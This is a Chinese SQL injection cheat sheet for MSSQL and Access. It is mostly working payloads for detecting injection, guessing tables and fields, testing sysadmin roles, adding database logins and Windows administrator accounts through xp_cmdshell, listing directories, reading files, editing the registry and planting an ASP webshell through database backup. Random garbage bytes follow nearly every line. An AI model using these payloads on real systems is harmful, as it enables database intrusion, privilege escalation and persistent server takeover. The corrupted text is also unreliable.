1.判断是否有注入;and 1=1 ;and 1=2 �"Z=5�g�j
2.初步判断是否是mssql ;and user>0 LO�y0hN-$b
l�^�Mz�N��
3.注入参数是字符'and [查询条件] and ''=' }�J:+{4Yn
4LH[4Y�j?`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �cD|��Htt"
b</9A�i=��
5.判断数据库系统 Vr[czfROz'
"es?��=���
;and (select count(*) from sysobjects)>0 mssql c�vd\/p�G)
-_���C#wtC
;and (select count(*) from msysobjects)>0 access SMH�<'F7�i
8T)&`dM6P~
~@� �jY[_�
uw�(NG.�4
6.猜数据库 ;and (select Count(*) from [数据库名])>0 -�s|8<A||"
�B~
S�6�R
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C��qi���i}
j^t�W
��Iz
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �C)'q
�QvA
{--0�z�3n>
9.(1)猜字段的ascii值(access) Z/;Xl���~�
Ian[LbCWB�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yXI ��>I��
'y�]\�-�T
(2)猜字段的ascii值(mssql) bHLT�}x/Gw
Et�bnE�*S
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F!zP<�A��"
t��\P<X^d%
10.测试权限结构(mssql) 05y�Za�d*�
@fv��}G>t
c~�QS9)=E�
0:0NXVYs&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- goa�t�<\�a
3��>E%e!D%
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [/��s&K{+c
w�NFz*�|n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- e:H��26�SW
J�^R=d�T!�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- n�Ox4<Wk�&
4P^6oh0�"�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��F�����
�H��]4H�j�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- X\�EV�Td)@
�Y�!i��Z�W
;and 1=(select IS_MEMBER('db_owner'));-- HbP!KVHyk1
�_@S`5;4x�
kmz�H'wktt
V%$/��#sza
11.添加mssql和系统的帐户 �,����h�"-
�F}Vr��:~�
;exec master.dbo.sp_addlogin username;-- �"ju6XdZo
;exec master.dbo.sp_password null,username,password;-- 4_Dp+�^J�F
[Nn�`�l,��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g��&/��T*L
{uzf"�%VtP
;exec master.dbo.xp_cmdshell 'net user username password U�9��b?i$�
�=UyLk-P
w
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �{(���r6e
D %Xo�&�V[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��)K �&(��
eX@L3��BKp
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- y;/V�B�,4V
#o1=�:PQaC
H":o�Npf�b
(�#+^�&��1
12.(1)遍历目录 �6�@D��F��
}�&_/PA0j
;create table dirs(paths varchar(100), id int) mI�74x3 [�
6{���=\7AY
;insert dirs exec master.dbo.xp_dirtree 'c:\' d!eY�qM7-G
���m2AnXY\
;and (select top 1 paths from dirs)>0 p�K0"�%eA
*z��@>�!8?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]U"94S U:)
oJ�N#C%�r7
5\�z�`-�)
�<[w=TdCPs
(2)遍历目录 ]�+�X@
��7
6�Ybg^�0m�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (�o`{uj{�!
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �;*�MLR�Xq
e���M8}�X[
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 c/sC&i;%�O
�3Z1�CWzq(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &jmRA�';sK
.V�,@k7U,V
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ](hE^\SC�
�=>-�Rnc@
#ep`��nf0x
��;+��"+3�
13.mssql中的存储过程 �ei�o�4k�-
!r<pmr3f@7
xp_regenumvalues 注册表根键, 子键 D�h=9Gns9�
Y�PxM<Gfa8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9 AJ(�&qY(
VV��l�r�*`
xp_regread 根键,子键,键值名 �Zu7�)��gf
hI�T+gnh�h
;exec xp_regread �v?geCe=ng
4�t��=�G
�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 L��Gn�:c;�
5��aCgjA11
xp_regwrite 根键,子键, 值名, 值类型, 值 |:gf l�seE
jn�n}V�~�L
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ~sh`r�{��0
T:~��vk.Or
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7<*yS3�10�
s%W �C/ZK�
xp_regdeletevalue 根键,子键,值名 ')cM�iX\v�
;0T��x-8l�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 H�Aa��;�hb
�y gz��6�C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 .6Pw|xu`Pw
�ln6d<;
M5
M!�o##* *`
[1S|dc>.O%
14.mssql的backup创建webshell #p�nI\���
K�|[*�t~59
use model �lN�Yt`xp�
%�xI �p5h]
create table cmd(str image); vQ
6^xvk]�
2f�L;-\!y(
insert into cmd(str) values (''); �glD�u2a,Q
,�
K�~}\CR
backup database model to disk='c:\l.asp'; 5j�?3a1l0�
_��z��|65H
=c\�>�(2D�
=�%TWX��[w
15.mssql内置函数 �.�[I��Cx�
Q���~#Wf�?
;and (select @@version)>0 获得Windows的版本号 asppR�L|�|
Li��4zTR|U
;and user_name()='dbo' 判断当前系统的连接用户是不是sa b0Ps5G\ u�
W_"sM0�
w�
;and (select user_name())>0 爆当前系统的连接用户 �uxr� #Q�A
p$]�3��'jw
;and (select db_name())>0 得到当前连接的数据库 vg32y /l]S
�X�}Ai�-D�
[M=7�M}f;�
��yPb"���V
16.简洁的webshell m��;�GCc�8
zHM(!\8�K
use model #L�h;C��SS
3YR!Mq�$|~
create table cmd(str image); at�,XB.}Z]
<�Z���m�g#
insert into cmd(str) values (''); !�Wntd\��w
�KW pVw�!�
backup database model to disk='g:\wwwtest\l.asp';
